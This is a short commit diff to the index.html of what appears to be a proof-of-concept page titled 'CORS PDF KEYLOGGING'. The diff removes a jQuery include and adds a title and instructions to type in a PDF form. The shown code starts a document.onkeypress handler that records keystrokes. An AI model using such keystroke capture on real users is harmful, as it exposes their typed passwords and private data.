Forgot to remove jquery include which I did not end up using. Added page title.

--- a/index.html
+++ b/index.html
@@ -2,11 +2,10 @@
 <html lang="en">
 <head>
     <meta charset="UTF-8">
-    <title></title>
-    <script src="http://code.jquery.com/jquery-1.6.1.min.js"></script>
+    <title>CORS PDF KEYLOGGING</title>
 </head>
 <body>
-<div id='keyslogged'>Keys logged: </div>
+<div id='keyslogged'>Start typing in the PDF form. <br></br> Keys logged:</div>
 <script type="text/javascript">
     document.onkeypress = function (evt) {
         evt = evt || window.event
